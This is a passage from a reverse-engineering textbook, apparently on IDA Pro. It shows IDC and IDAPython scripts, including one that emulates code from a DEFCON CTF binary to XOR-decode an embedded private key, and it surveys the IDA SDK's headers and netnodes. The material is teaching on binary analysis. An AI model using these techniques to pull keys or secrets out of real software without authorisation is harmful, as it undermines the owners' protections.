with your Windows version of IDA. Without any MIPS hardware, you would not

be able to execute the MIPS binary and observe any data decoding it might

perform. You could, however, write an IDC script to mimic the behavior of

the binary and make the required changes within the IDA database, all with

no need for a MIPS execution environment.

The following x86 code was extracted from a DEFCON9 Capture the

Flag binary.10

.text:08049EDE mov [ebp+var_4], 0

.text:08049EE5

.text:08049EE5 loc_8049EE5:

.text:08049EE5 cmp [ebp+var_4], 3C1h

.text:08049EEC ja short locret_8049F0D

.text:08049EEE mov edx, [ebp+var_4]

.text:08049EF1 add edx, 804B880h

.text:08049EF7 mov eax, [ebp+var_4]

.text:08049EFA add eax, 804B880h

.text:08049EFF mov al, [eax]

.text:08049F01 xor eax, 4Bh

.text:08049F04 mov [edx], al

.text:08049F06 lea eax, [ebp+var_4]

.text:08049F09 inc dword ptr [eax]

.text:08049F0B jmp short loc_8049EE5

This code decodes a private key that has been embedded within the pro-

gram binary. Using the IDC script shown in Listing 15-7, we can extract the

private key without running the program:

auto var_4, edx, eax, al;

var_4 = 0;

while (var_4 <= 0x3C1) {

edx = var_4;

9. See http://www.defcon.org/.

10. Courtesy of Kenshoto, the organizers of CTF at DEFCON 15. Capture the Flag is an annual

hacking competition held at DEFCON.

IDA Scripting 279

edx = edx + 0x804B880;

eax = var_4;

eax = eax + 0x804B880;

al = Byte(eax);

al = al ^ 0x4B;

PatchByte(edx, al);

var_4++;

}

Listing 15-7: Emulating assembly language with IDC

Listing 15-7 is a fairly literal translation of the preceding assembly lan-

guage sequence generated according to the following rather mechanical

rules.

1. For each stack variable and register used in the assembly code, declare

an IDC variable.

2. For each assembly language statement, write an IDC statement that mim-

ics its behavior.

3. Reading and writing stack variables is emulated by reading and writing

the corresponding variable declared in your IDC script.

4. Reading from a nonstack location is accomplished using the Byte, Word,

or Dword function, depending on the amount of data being read (1, 2, or

4 bytes).

5. Writing to a nonstack location is accomplished using the PatchByte, Patch-

Word, or PatchDword function, depending on the amount of data being

written.

6. In general, if the code appears to contain a loop for which the termina-

tion condition is not immediately obvious, it is easiest to begin with an

infinite loop such as while (1) {} and then insert a break statement when

you encounter statements that cause the loop to terminate.

7. When the assembly code calls functions, things get complicated. In

order to properly simulate the behavior of the assembly code, you must

find a way to mimic the behavior of the function that has been called,

including providing a return value that makes sense within the context

of the code being simulated. This fact alone may preclude the use of IDC

as a tool for emulating the behavior of an assembly language sequence.

The important thing to understand when developing scripts such as the

previous one is that it is not absolutely necessary to fully understand how

the code you are emulating behaves on a global scale. It is often sufficient

to understand only one or two instructions at a time and generate correct

IDC translations for those instructions. If each instruction has been correctly

translated into IDC, then the script as a whole should properly mimic the

complete functionality of the original assembly code. We can delay further

study of the assembly language algorithm until after the IDC script has

been completed, at which point we can use the IDC script to enhance our

280 Chapter 15

understanding of the underlying assembly. Once we spend some time con-

sidering how our example algorithm works, we might shorten the preceding

IDC script to the following:

auto var_4, addr;

for (var_4 = 0; var_4 <= 0x3C1; var_4++) {

addr = 0x804B880 + var_4;

PatchByte(addr, Byte(addr) ^ 0x4B);

}

As an alternative, if we did not wish to modify the database in any way, we

could replace the PatchByte function with a call to Message if we were dealing

with ASCII data, or as an alternative we could write the data to a file if we

were dealing with binary data.

IDAPython

IDAPython is a plug-in developed by Gergely Erdelyi that integrates a Python

interpreter into IDA. Combined with supplied Python bindings, this plug-in

allows you to write Python scripts with full access to all of the capabilities of

the IDC scripting language. One clear advantage gained with IDAPython is

access to Python’s native data-handling capabilities as well as the full range

of Python modules. In addition, IDAPython exposes a significant portion of

IDA’s SDK functionality, allowing for far more powerful scripting than is pos-

sible using IDC. IDAPython has developed quite a following in the IDA com-

munity. Ilfak’s blog11 contains numerous interesting examples of problem

solving with Python scripts, while questions, answers, and many other useful

IDAPython scripts are frequently posted in the forums at OpenRCE.org.12 In

addition, third-party tools such as BinNavi13 from Zynamics rely on IDA and

IDAPython in order to perform various subtasks required by the tools.

Since IDA 5.4, Hex-Rays has been including IDAPython as a standard

plug-in. Source code for the plug-in is available for download on the IDA-

Python project page,14 and API documentation is available on the Hex-Rays

website.15 IDA enables the plug-in only when Python is found to be installed

on the computer on which you are running IDA. The Windows version of

IDA ships with and installs a compatible version of Python,16 while the Linux

and OS X versions of IDA leave proper installation of Python up to you. On

Linux, the current version of IDA (6.1) looks for Python 2.6. IDAPython is

compatible with Python 2.7, and IDA will work just fine if you create symlinks

11. See http://www.hexblog.com.

12. See http://www.openrce.org/articles/.

13. See http://www.zynamics.com/binnavi.html.

14. See http://code.google.com/p/idapython/.

15. See http://www.hex-rays.com/idapro/idapython_docs/index.html.

16. See http://www.python.org/.

IDA Scripting 281

from the required Python 2.6 libraries to your existing Python 2.7 libraries. If

you have Python 2.7, a command similar to the following will create the sym-

link that will make IDA happy:

# ln –s /usr/lib/libpython2.7.so.1.0 /usr/lib/libpython2.6.so.1

OS X users may find that the version of Python that ships with OS X is

older than that required by IDA. If this is the case, a suitable Python installer

should be downloaded from www.python.org.17

Using IDAPython

IDAPython bridges Python code into IDA by making available three

Python modules, each serving a specific purpose. Access to the core IDA

API (as exposed via the SDK) is made available with the idaapi module. All

of the functions present in IDC are made available in IDAPython’s idc mod-

ule. The third module that ships with IDAPython is idautils, which provides

a number of utility functions, many of which yield Python lists of various

database-related objects such as functions or cross-references. Modules idc

and idautils are automatically imported for all IDAPython scripts. If you

need idaapi, on the other hand, you must import it yourself.

When using IDAPython, keep in mind that the plug-in embeds a single

instance of the Python interpreter into IDA. This interpreter is not destroyed

until you close IDA. As a result, you can view all of your scripts and state-

ments as if they are running within a single Python shell session. For exam-

ple, once you have imported the idaapi module for the first time in your IDA

session, you need never import it again until you restart IDA. Similarly, ini-

tialized variables and function definitions retain their values until they are

redefined or until you quit IDA.

There are a number of strategies for learning IDA’s Python API. If you

already have some experience using IDC or programming with the IDA SDK,

then you should feel right at home with the idaapi and idc modules. A quick

review of the additional features in the idautils module should be all you

really need to start making full use of IDAPython. If you have prior experi-

ence with IDC or the SDK, then you might dive into the Hex-Ray’s docu-

mentation for the Python API to develop a feel for the capabilities it offers.

Remember that the idc module basically mirrors the IDC API and that you

may find the list of IDC functions in IDA’s built-in help to be quite useful.

Similarly, the descriptions of IDC functions presented earlier in this chapter

are equally applicable to the corresponding functions in the idc module.

17. See http://www.python.org/download/mac/.

282 Chapter 15

IDAPython Scripting Examples

By way of offering a compare and contrast between IDC and IDAPython,

the following sections present the same example cases seen previously in the

discussion of IDC. Wherever possible we endeavor to make maximum use of

Python-specific features to demonstrate some of the efficiencies that can be

gained by scripting in Python.

Enumerating Functions

One of the strengths of IDAPython is the way that it uses Python’s powerful

datatypes to simplify access to collections of database objects. In Listing 15-8,

we reimplement the function enumeration script of Listing 15-1 in Python.

Recall that the purpose of this script is to iterate over every function in a

database and print basic information about each function, including the

start and end addresses of the function, the size of the function’s arguments,

and the size of the function’s local variable space. All output is sent to the

output window.

funcs = Functions()X

for f in funcs:Y

name = Name(f)

end = GetFunctionAttr(f, FUNCATTR_END)

locals = GetFunctionAttr(f, FUNCATTR_FRSIZE)

frame = GetFrame(f) # retrieve a handle to the function’s stack frame

if frame is None: continue

ret = GetMemberOffset(frame, " r") # " r" is the name of the return address

if ret == -1: continue

firstArg = ret + 4

args = GetStrucSize(frame) - firstArg

Message("Function: %s, starts at %x, ends at %x\n" % (name, f, end))

Message(" Local variable area is %d bytes\n" % locals)

Message(" Arguments occupy %d bytes (%d args)\n" % (args, args / 4))

Listing 15-8: Function enumeration using Python

For this particular script, the use of Python gains us little in the way of

efficiency other than the use of the Functions X list generator, which facili-

tates the for loop at Y.

Enumerating Instructions

Listing 15-9 demonstrates how the instruction-counting script of Listing 15-2

might be written in Python, taking advantage of the list generators available

in the idautils module.

from idaapi import *

func = get_func(here())X # here() is synonymous with ScreenEA()

if not func is None:

fname = Name(func.startEA)

count = 0

IDA Scripting 283

for i in FuncItems(func.startEA)Y: count = count + 1

Warning("%s contains %d instructions\n" % (fname,count))

else:

Warning("No function found at location %x" % here())

Listing 15-9: Instruction enumeration in Python

Differences from the IDC version include the use of an SDK function X

(accessed via idaapi) to retrieve a reference to a function object (specifically

a func_t) and the use of the FuncItems generator Y (from idautils) to provide

easy iteration over all of the instructions within the function. Because we can’t

use Python’s len function on a generator, we are still obligated to step through

the generator list in order to count each instruction one at a time.

Enumerating Cross-References

The idautils module contains several generator functions that build cross-

reference lists in a somewhat more intuitive way than we saw in IDC. List-

ing 15-10 rewrites the function call enumeration script that we saw previously

in Listing 15-3.

from idaapi import *

func = get_func(here())

if not func is None:

fname = Name(func.startEA)

items = FuncItems(func.startEA)

for i in items:

for xref in XrefsFrom(i, 0):X

if xref.type == fl_CN or xref.type == fl_CF:

Message("%s calls %s from 0x%x\n" % (fname, Name(xref.to), i))

else:

Warning("No function found at location %x" % here())

Listing 15-10: Enumerating function calls using Python

New in this script is the use of the XrefsFrom generator X (from idautils)

to step through all cross-references from the current instruction. XrefsFrom

returns a reference to an xrefblk_t object that contains detailed information

about the current cross-reference.

Enumerating Exported Functions

Listing 15-11 is the Python version of the .idt generator script from Listing 15-5.

file = AskFile(1, "*.idt", "Select IDT save file")

with open(file, 'w') as fd:

fd.write("ALIGNMENT 4\n")

fd.write("0 Name=%s\n" % GetInputFile())

for i in range(GetEntryPointQty()):

ord = GetEntryOrdinal(i)

if ord == 0: continue

addr = GetEntryPoint(ord)

284 Chapter 15

if ord == addr: continue #entry point has no ordinal

fd.write("%d Name=%s" % (ord, Name(addr)))

purged = GetFunctionAttr(addr, FUNCATTR_ARGSIZE)

if purged > 0:

fd.write(" Pascal=%d" % purged)

fd.write("\n")

Listing 15-11: A Python script to generate IDT files

The two scripts look remarkably similar because IDAPython has no gen-

erator function for entry-point lists, so we are left to use the same set of func-

tions that were used in Listing 15-5. One difference worth noting is that

IDAPython deprecates IDC’s file-handling functions in favor of Python’s

built-in file-handling functions.

Summary

Scripting provides a powerful means for extending IDA’s capabilities. Through

the years, scripts have been used in a number of innovative ways to fill the

needs of IDA users. Many useful scripts are available for download on the

Hex-Rays website as well as the mirror site of the former IDA Palace.18 IDA

scripts are perfect for small tasks and rapid development, but they are not

ideally suited for all situations.

One of the principal limitations of the IDC language is its lack of support

for complex datatypes and the lack of access to a more fully featured API such

as the C standard library or the Windows API. At the expense of greater com-

plexity, we can lift these limitations by moving away from scripted extensions

and toward compiled extensions. As we will show in the next chapter, com-

piled extensions require the use of the IDA software development kit (SDK),

which has a steeper learning curve than either IDC or IDAPython. However,

the power available when developing extensions with the SDK is usually well

worth the effort spent learning how to use it.

18. See http://old.idapalace.net/.

JMP

EBP

SUB

THE IDA SOFTWARE

DEVELOPMENT KIT

Throughout the course of the book, we

have used phrases like “IDA does this,” and

“IDA does that.” While IDA certainly does an

awful lot for us, the intelligence is more correctly

attributed to the various modules upon which IDA

relies. For example, it is the processor module that

makes all of the decisions during the analysis phase, so one could argue that

IDA is only as smart as the processor modules on which it relies. Of course,

Hex-Rays puts tremendous effort into ensuring that its processor modules are

as capable as possible, and for the casual user, IDA neatly hides its modular

architecture beneath its user interface.

At some point you may find yourself needing more power than the IDC

scripting language has to offer, whether for performance reasons or because

you wish to do things that IDC simply was not designed to do. When that

moment arrives, it is time to advance to using IDA’s software development kit

(SDK) to build your own compiled modules for use with IDA.

286 Chapter 16

NOTE The IDC scripting engine is built on top of IDA’s SDK. All IDC functions are ultimately

translated to calls to one or more SDK functions that perform the actual work. While it

is true that if you can do something in IDC, you can do the same thing using the SDK,

the reverse does not hold. The SDK offers far more power than is available using IDC

alone, and many SDK actions have no IDC counterpart.

The SDK exposes IDA’s internal programming interfaces in the form of

C++ libraries and the header files required to interface to those libraries. The

SDK is required in order to create loader modules to handle new file formats,

processor modules to disassemble new CPU instruction sets, and plug-in

modules that might be viewed as more powerful, compiled alternatives to

scripts.

In this chapter we introduce some of the core capabilities of the SDK.

You will find these capabilities useful whether you are creating plug-ins,

loader modules, or processor modules. As each of these types of modules is

covered individually in the following three chapters, the examples in this

chapter are offered without attempting to supply a specific context in which

they might be used.

SDK Introduction

IDA’s SDK is distributed in much the same manner as the other IDA extras

that we have discussed so far. The Zip file containing the SDK can be found

on your original IDA CD, or authorized users can download the SDK from

the Hex-Rays website. Each version of the SDK is named for the version of

IDA with which it is compatible (for example, idasdk61.zip goes with IDA

version 6.1). The SDK features the same minimalist documentation typically

found in other IDA-related tools, which in the case of the SDK means a

BELLS, WHISTLES, AND BULLETS TO THE FOOT

While working with C++, you will of course have access to a wide variety of C++

libraries, including your operating system’s native APIs. By utilizing such libraries,

you may be tempted to incorporate a wide variety of sophisticated features into

any modules that you build. However, you should be very careful what functionality

you choose to incorporate in this way, as it may lead to instability in IDA. The most

concrete example of this is the fact that IDA is a single-threaded application. No

effort whatsoever is made to synchronize access to low-level database structures,

nor does the SDK provide facilities for doing so. For IDA versions earlier than 5.5,

you should never create additional threads that may simultaneously access the

database. For versions 5.5 and later, you may create additional threads, but any

calls to SDK functions should be queued using the exec_request_t and execute_sync

function described in kernwin.hpp. Also, you should understand that any blocking*

operations you perform will render IDA unresponsive until the operation completes.

*A blocking operation is an action that causes a program to come to a halt while it awaits

completion of the action.

The IDA Software Development Kit 287

top-level readme.txt file and additional README files for plug-ins, processor

modules, and loaders.

The SDK defines the published programming interface that modules

may use to interact with IDA. Prior to SDK version 4.9, it was not uncommon

for these interfaces to change enough that a module that successfully com-

piled under SDK 4.8 might no longer compile under a newer SDK, such as

version 4.9, without the need for changes. With the introduction of version 4.9

of the SDK, Hex-Rays chose to standardize the existing API, which means

that not only would modules require no changes to compile successfully with

newer versions of the SDK, but modules would also be binary compatible

with newer versions of IDA. This means that module users need no longer

wait for module authors to update their source code or make available

updated binary versions of their modules each time a new version of IDA is

released. It does not mean that existing API interfaces are completely frozen;

Hex-Rays continues to introduce new features with each new version of the

SDK (that is, each new SDK is a superset of its predecessor). Modules that

make use of these newer features are typically not compatible with older

versions of IDA or the SDK. That said, there have been occasions where, for

various reasons, functions have been renamed or marked as obsolete. The

SDK offers macros to allow or disallow the use of deprecated functions,

making it easy to note when a function has been deprecated.

SDK Installation

Prior to version 5.4, the Zip file containing the SDK does not contain a top-

level directory. Because the SDK shares several subdirectory names with IDA,

it is highly recommended that you create a dedicated SDK directory, such as

idasdk53, and extract the SDK contents into that directory. This will make it

much easier to distinguish SDK components from IDA components. Begin-

ning with version 5.4, the IDA SDK is packaged within a top-level SDK

directory, such as idasdk61, so this step is no longer needed. There is no

requirement to install the SDK in a specific location relative to <IDADIR>.

Regardless of where you choose to install your SDK, we will refer to the SDK

directory generically as <SDKDIR> for the remainder of the book.

SDK Layout

A basic understanding of the directory structure used within the SDK will be

helpful, both in knowing where you might find documentation and in know-

ing where you can expect to find the modules that you build. A quick rundown

of what you can expect to find in the SDK follows.

bin directory

This directory is where the example build scripts save their compiled

modules following a successful build. Installing a module involves copying

the module from the appropriate subdirectory within bin to the appro-

priate subdirectory in <IDADIR>. Module installation will be covered in

more detail in Chapters 17, 18, and 19. This directory also contains a

postprocessing tool required for the creation of processor modules.

288 Chapter 16

etc directory

This directory contains source code for two utilities that are required to

build some SDK modules. Compiled versions of these utilities are also

included with the SDK.

include directory

This directory contains the header files that define the interface to the

IDA API. In short, every API data structure that you are allowed to use

and every API function that you are allowed to call are declared in one

of the header files in this directory. The SDK’s top-level readme.txt file

contains an overview of some of the more commonly used header files

in this directory. The files in this directory constitute the bulk of the

documentation (as in “read the source”) for the SDK.

ldr directory

This directory contains the source code and build scripts for several

example loader modules. The README file for loaders is nothing more

than a rundown of the contents of this directory.

lib directory

This directory contains a number of subdirectories, which in turn con-

tain the link libraries required to build various IDA modules. The subdi-

rectories are named after the compiler with which they should be used.

For example, x86_win_vc_32 (6.1 and later) or vc.w32 (6.0 and earlier) con-

tains the library to use with Visual Studio and 32-bit IDA on Windows,

while x64_mac_gcc_64 (6.1 and later) or gcc64.mac64 (6.0 and earlier) con-

tains the library for use with 64-bit IDA on OSX platforms.

module directory

This directory contains the source code and build scripts for several

example processor modules. The README file for processor modules

is nothing more than a rundown of the contents of this directory.

plug-ins directory

This directory contains the source code and build scripts for several

example plug-in modules. The README file for plug-ins provides a

high-level overview of the plug-in architecture.

top-level directory

The top level of the SDK contains several make files used for building

modules as well as the main readme.txt file for the SDK. Several additional

install_xxx.txt files contain information regarding installation and con-

figuration for various compilers (for example, install_visual.txt discusses

Visual Studio configuration).

Keep in mind that documentation on using the SDK is sparse. For most

developers, knowledge of the SDK has been derived through trial and error

and extensive exploration of the contents of the SDK. You may have some

luck posting questions to the Research & Resources forum on the Hex-Rays

support forums, where other IDA users familiar with the SDK may answer

The IDA Software Development Kit 289

them. An excellent third-party resource providing an introduction to the SDK

and plug-in writing is Steve Micallef’s guide titled IDA Plug-in Writing in C/C++.1

Configuring a Build Environment

One of the more frustrating aspects of using the SDK is not related to pro-

gramming at all. Instead, you may find that it is relatively easy to code up a

solution to a problem only to find that it is virtually impossible to successfully

build your module. This is true because it can be difficult to support a wide

variety of compilers with a single code base, and coding a solution is com-

plicated by the fact that library file formats recognized by Windows compilers

are often incompatible with one another.

All of the examples included with the SDK were created to be built using

Borland tools. From install_make.txt we have the following quote from Ilfak:

WIN32 versions can be created only by Borland C++ CBuilder v4.0.

Probably the old BCC v5.2 will work too, but I haven’t checked it.

That being said, other install_xxx files offer pointers on how to success-

fully build modules with other compilers. A few of the example modules

contain files for building with Visual Studio (<SDKDIR>/plugins/vcsample,

for example), while install_visual.txt offers a series of steps for properly

configuring SDK projects using Visual C++ Express 2005.

In order to build modules using Unix-style tools, either on a Unix-style

system such as Linux or using an environment such as MinGW, the SDK

provides a script named idamake.pl that converts the Borland-style make files

into Unix-style make files prior to initiating the build process. This process is

discussed in install_linux.txt.

NOTE The command-line build scripts provided with the SDK expect an environment variable

named IDA to point to <SDKDIR>. You can set this globally for all scripts by editing

<SDKDIR>/allmake.mak and <SDKDIR>/allmake.unx to set this variable or

by adding an IDA environment variable to your global environment.

Steve Micallef’s guide also provides excellent instructions for configuring

build environments for building plug-ins with various compilers. Our personal

preference when building SDK modules for Windows versions of IDA is to

use the MinGW tools gcc and make. The examples presented in Chapters 17,

18, and 19 include makefiles and Visual Studio project files that do not rely

on any of the build scripts included with the SDK and that are easy to modify

to suit the needs of your projects. Module-specific build configuration will

also be discussed in each of these chapters.

The IDA Application Programming Interface

IDA’s API is defined by the contents of the header files in <SDKDIR>/

include. There is no single-source index of available functions (though

Steve Micallef has collected a rather nice subset in his plug-in writing

1. See http://www.binarypool.com/idapluginwriting/.

290 Chapter 16

guide). Many prospective SDK programmers find this fact initially difficult to

come to terms with. The reality is that there is never an easy-to-find answer to

the question, “How do I do x using the SDK?” The two principal options for

answering such questions are to post the questions to an IDA user’s forum or

attempt to answer them yourself by searching through the API documenta-

tion. What documentation, you say? Why, the header files, of course. Granted,

these are not the most searchable of documents, but they do contain the

complete set of API features. In this case, grep (or a suitable replacement,

preferably built into your programming editor) is your friend. The catch is

knowing what to search for, which is not always obvious.

There are a few ways to try to narrow your searches through the API.

The first way is to leverage your knowledge of the IDC scripting language

and attempt to locate similar functionality within the SDK using keywords

and possibly function names derived from IDC. However—and this is an

extremely frustrating point—while the SDK may contain functions that

perform tasks identical to those of IDC functions, the names of those func-

tions are seldom identical. This results in programmers learning two sets of

API calls, one for use with IDC and one for use with the SDK. In order to

address this situation, Appendix B presents a complete list of IDC functions

and the corresponding SDK 6.1 actions that are carried out to execute those

functions.

The second technique for narrowing down SDK-related searches is to

become familiar with the content and, more important, the purpose of the

various SDK header files. In general, related functions and associated data

structures are grouped into headers files based on functional groups. For

example, SDK functions that allow interaction with a user are grouped into

kernwin.hpp. When a grep-style search fails to locate a capability that you

require, some knowledge of which header file relates to that capability will

narrow your search and hopefully limit the number of files that you need to

dig deeper into.

Header Files Overview

While the SDK’s readme.txt files provide a high-level overview of the most

commonly used header files, this section highlights some other useful infor-

mation for working with these files. First, the majority of the header files use

the .hpp suffix, while a few use the .h suffix. This can easily lead to trivial

errors when naming header files to be included in your files. Second, ida.hpp

is the main header file for the SDK and should be included in all SDK-related

projects. Third, the SDK utilizes preprocessor directives designed to preclude

access to functions that Hex-Rays considers dangerous (such as strcpy and

sprintf). For a complete list of these functions refer to the pro.h header file. To

restore access to these functions, you must define the USE_DANGEROUS_FUNCTIONS

macro prior to including ida.hpp in your own files. An example is shown here:

#define USE_DANGEROUS_FUNCTIONS

#include <ida.hpp>

The IDA Software Development Kit 291

Failure to define USE_DANGEROUS_FUNCTIONS will result in a build error to

the effect that dont_use_snprintf is an undefined symbol (in the case of an

attempt to use the snprintf function). In order to compensate for restricting

access to these so-called dangerous functions, the SDK defines safer equiv-

alents for each, generally in the form of a qstrXXXX function such as qstrncpy

and qsnprintf. These safer versions are also declared in pro.h.

Along similar lines, the SDK restricts access to many standard file

input/output variables and functions such as stdin, stdout, fopen, fwrite,

and fprintf. This restriction is due in part to limitations of the Borland

compiler. Here again the SDK defines replacement functions in the form

of qXXX counterparts such as qfopen and qfprintf. If you require access to the

standard file functions, then you must define the USE_STANDARD_FILE_FUNCTIONS

macro prior to including fpro.h (which is included from kernwin.hpp, which is,

in turn, included from several other files).

In most cases, each SDK header file contains a brief description of the

file’s purpose and fairly extensive comments describing the data structures

and functions that are declared in the file. Together these comments consti-

tute IDA’s API documentation. Brief descriptions of some of the more

commonly used SDK header files follow.

area.hpp

This file defines the area_t struct, which represents a contiguous block of

addresses within a database. This struct serves as the base class for several

other classes that build on the concept of an address range. It is seldom

necessary to include this file directly, as it is typically included in files

defining subclasses of area_t.

auto.hpp

This file declares functions used to work with IDA’s autoanalyzer. The

autoanalyzer performs queued analysis tasks when IDA is not busy

processing user-input events.

bytes.hpp

This file declares functions for working with individual database bytes.

Functions declared in this file are used to read and write individual

database bytes as well as manipulate the characteristics of those bytes.

Miscellaneous functions also provide access to flags associated with

instruction operands, while other functions allow manipulation of

regular and repeatable comments.

dbg.hpp

This file declares functions offering programmatic control of IDA’s

debugger.

entry.hpp

This header declares functions for working with a file’s entry points. For

shared libraries, each exported function or data value is considered an

entry point.

292 Chapter 16

expr.hpp

This file declares functions and data structures for working with IDC

constructs. It is possible to modify existing IDC functions, add new IDC

functions, or execute IDC statements from within modules.

fpro.h

This file contains the alternative file I/O functions, such as qfopen,

discussed previously.

frame.hpp

This header contains functions used to manipulate stack frames.

funcs.hpp

This header contains functions and data structures for working with

disassembled functions as well as functions for working with FLIRT

signatures.

gdl.hpp

This file declares support routines for generating graphs using either

DOT or GDL.

ida.hpp

This is the main header file required for working with the SDK. This file

contains the definition of the idainfo structure as well as the declaration

of the global variable inf, which contains a number of fields containing

information about the current database as well as fields initialized from

configuration file settings.

idp.hpp

This file contains declarations of structures that form the foundation

of processor modules. The global variable ph, which describes the current

processor module, and the global variable ash, which describes the current

assembler, are defined in this file.

kernwin.hpp

This file declares functions for interacting with the user and the user

interface. The SDK equivalents of IDC’s AskXXX functions are declared

here, as are functions used to set the display position and configure

hotkey associations.

lines.hpp

This file declares functions for generating formatted, colorized

disassembly lines.

loader.hpp

This file contains the declarations for the loader_t and plugin_t structures

required for the creation of loader modules and plug-in modules, respec-

tively, as well as functions useful during the file-loading phase and

functions for activating plug-ins.

The IDA Software Development Kit 293

name.hpp

This file declares functions for manipulating named locations (as opposed

to names within structures or stack frames, which are covered in stuct.hpp

and funcs.hpp, respectively).

netnode.hpp

Netnodes are the lowest-level storage structure accessible via the API.

The details of netnodes are typically hidden by the IDA user interface.

This file contains the definition of the netnode class and functions for

low-level manipulation of netnodes.

pro.h

This file includes the top-level typedefs and macros required in any SDK

module. You do not need to explicitly include this file in your projects,

as it is included from ida.hpp. Among other things, the IDA_SDK_VERSION

macro is defined in this file. IDA_SDK_VERSION provides a means to deter-

mine with which version of the SDK a module is being built, and it can

be tested to provide conditional compilation when using different ver-

sions of the SDK. Note that IDA_SDK_VERSION was introduced with SDK

version 5.2. Prior to SDK 5.2, there is no official way to determine which

SDK is being used. An unofficial header file that defines IDA_SDK_VERSION

for older versions of the SDK (sdk_versions.h) is available on this book’s

website.

search.hpp

This file declares functions for performing different types of searches on

a database.

segment.hpp

This file contains the declaration of the segment_t class, a subclass of area_t,

which is used to describe individual sections (.text, .data, etc.) within a

binary. Functions for working with segments are also declared here.

struct.hpp

This file contains the declaration of the struc_t class and functions for

manipulating structures within a database.

typeinf.hpp

This file declares functions for working with IDA type libraries. Among

other things, functions declared here offer access to function signatures,

including function return types and parameter sequences.

ua.hpp

This file declares the op_t and insn_t classes used extensively in processor

modules. Also declared here are functions used for disassembling individ-

ual instructions and for generating the text for various portions of each

disassembled line.

xref.hpp

This file declares the datatypes and functions required for adding,

deleting, and iterating code and data cross-references.

294 Chapter 16

The preceding list describes approximately half of the header files that

ship with the SDK. You are encouraged to familiarize yourself not only with

the files in this list but also with all of the other header files as well, as you dig

deeper into the SDK. Functions that make up the published API are marked

as ida_export. Only functions designated as ida_export are exported in the

link libraries that ship with the SDK. Don’t be misled by the use of idaapi,

as it merely signifies that a function is to use the stdcall calling convention

on Windows platforms only. You may occasionally run across interesting-

looking functions that are not designated as ida_export; you cannot use

these functions in your modules.

Netnodes

Much of IDA’s API is built around C++ classes that model various aspects of a

disassembled binary. The netnode class, on the other hand, seems wrapped in

mystery because it appears to have no direct relationship to constructs within

binary files (sections, functions, instructions, etc.).

Netnodes are the lowest-level and most-general-purpose data storage

mechanism accessible within an IDA database. As a module programmer,

you will seldom be required to work directly with netnodes. Many of the

higher-level data structures hide the fact that they ultimately rely on netnodes

for persistent storage within a database. Some of the ways that netnodes are

used within a database are detailed in the file nalt.hpp, in which we learn, for

example, that information about the shared libraries and functions that a

binary imports is stored in a netnode named import_node (yes, netnodes may

have names). Netnodes are also the persistent storage mechanisms that facil-

itate IDC’s global arrays.

Netnodes are described in extensive detail in the file netnode.hpp. But

from a high-level perspective, netnodes are storage structures used internally

by IDA for a variety of purposes. However, their precise structure is kept

hidden, even to SDK programmers. To provide an interface to these storage

structures, the SDK defines a netnode class, which functions as an opaque

wrapper around this internal storage structure. The netnode class contains a

single data member called netnodenumber, which is an integer identifier used

to access the internal representation of a netnode. Every netnode is uniquely

identified by its netnodenumber. On 32-bit systems the netnodenumber is a 32-bit

quantity, allowing for 232 unique netnodes. On 64-bit systems, a netnodenumber

is a 64-bit integer, which allows for 264 unique netnodes. In most cases, the

netnodenumber represents a virtual address within the database, which creates

a natural mapping between each address within a database and any netnode

that might be required to store information associated with that address. Com-

ment text is an example of arbitrary information that may be associated with

an address and thus stored within a netnode associated with that address.

The IDA Software Development Kit 295

The recommended way to manipulate netnodes is by invoking member

functions of the netnode class using an instantiated netnode object. Reading

through netnode.hpp, you will notice that a number of nonmember functions

exist that seem to support netnode manipulation. Use of these functions is

discouraged in favor of member functions. You will note, however, that most

of the member functions in the netnode class are thin wrappers around one of

the nonmember functions.

Internally, netnodes can be used to store several different types of infor-

mation. Each netnode may be associated with a name of up to 512 characters

and a primary value of up to 1,024 bytes. Member functions of the netnode

class are provided to retrieve (name) or modify (rename) a netnode’s name.

Additional member functions allow you to treat a netnode’s primary value as

an integer (set_long, long_value), a string (set, valstr), or an arbitrary binary

blob2 (set, valobj). The function used inherently determines how the primary

value is treated.

Here is where things get a little complicated. In addition to a name and a

primary value, every netnode is also capable of storing 256 sparse arrays in which

the array elements can be arbitrarily sized with values up to a maximum of

1,024 bytes each. These arrays fall into three overlapping categories. The first

category of arrays is indexed using 32-bit index values and can potentially

hold in excess of 4 billion items. The second category of arrays is indexed

using 8-bit index values and can thus hold up to 256 items. The last category

of arrays is actually hash tables that use strings for keys. Regardless of which of

the three categories is used, each element of the array will accept values up

to 1,024 bytes in size. In short, a netnode can hold a tremendous amount

of data—now we just need to learn how to make it all happen.

If you are wondering where all of this information gets stored, you are

not alone. All netnode content is stored within btree nodes in an IDA data-

base. Btree nodes in turn are stored in an ID0 file, which in turn is archived

into an IDB file when you close your database. Any netnode content that you

create will not be visible in any of IDA’s display windows; the data is yours to

manipulate as you please. This is why netnodes are an ideal place for persist-

ent storage for any plug-ins and scripts that you may wish to use to store

results from one invocation to the next.

Creating Netnodes

A potentially confusing point about netnodes is that declaring a netnode

variable within one of your modules does not necessarily create an internal

representation of that netnode within the database. A netnode is not created

internally until one of the following events takes place:

zThe netnode is assigned a name.

zThe netnode is assigned a primary value.

zA value is stored into one of the netnode’s internal arrays.

2. Binary large object, or blob, is a term often used to refer to arbitray binary data of varying size.

296 Chapter 16

There are three constructors available for declaring netnodes within your

modules. The prototypes for each, extracted from netnode.hpp, and examples

of their use are shown in Listing 16-1.

#ifdef __EA64__

typedef ulonglong nodeidx_t;

#else

typedef ulong nodeidx_t;

#endif

class netnode {

Xnetnode();

Ynetnode(nodeidx_t num);

Znetnode(const char *name, size_t namlen=0, bool do_create=false);

[bool create(const char *name, size_t namlen=0);

\bool create();

//... remainder of netnode class follows

};

netnode n0; //usesX

netnode n1(0x00401110); //usesY

netnode n2("$ node 2"); //usesZ

netnode n3("$ node 3", 0, true); //usesZ

Listing 16-1: Declaring netnodes

In this example, only one netnode (n3) is guaranteed to exist within the

database after the code has executed. Netnodes n1 and n2 may exist if they

had been previously created and populated with data. Whether it previously

existed or not, n1 is capable of receiving new data at this point. If n2 did not

exist, meaning that no netnode named $ node 2 could be found in the data-

base, then n2 must be explicitly created ([ or \) before data can be stored

into it. If we want to guarantee that we can store data into n2, we need to

add the following safety check:

if (BADNODE == (nodeidx_t)n2) {

n2.create("$ node 2");

}

The preceding example demonstrates the use of the nodeidx_t operator,

which allows a netnode to be cast to a nodeidx_t. The nodeidx_t operator

simply returns the netnodenumber data member of the associated netnode

and allows netnode variables to be easily converted into integers.

An important point to understand about netnodes is that a netnode

